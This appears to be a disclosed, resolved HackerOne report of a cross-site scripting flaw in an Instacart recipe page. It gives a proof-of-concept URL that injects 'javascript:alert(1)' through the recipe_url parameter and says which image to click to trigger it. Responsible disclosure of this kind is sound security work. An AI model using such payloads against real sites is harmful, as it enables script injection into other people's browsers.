XSS in instacart.com/store/partner_recipe

Disclosed: 2017-05-11 19:10:14 By karel_origin To instacart
Medium
Vulnerability Details
Please open the following url ``` https://www.instacart.com/store/partner_recipe?recipe_url=javascript:alert(1)&partner_name=&ingredients%5B%5D=apples&ingredients%5B%5D=butter&ingredients%5B%5D=Splenda+Brown+Sugar+Blend&ingredients%5B%5D=cinnamon&ingredients%5B%5D=nutmeg&title=Barb%27s+Fried+Apples+-Diabetic-Low+Fat&description=&image_url=%2Fassets%2Fimg%2Fno-recipe-image.jpg ``` and click on the "Barb's Fried Apples -Diabetic-Low Fat" image to trigger the payload. The affected parameter is recipe_url
Actions
View on HackerOne
Report Stats
  • Report ID: 196221
  • State: Closed
  • Substate: resolved
  • Upvotes: 15
Share this report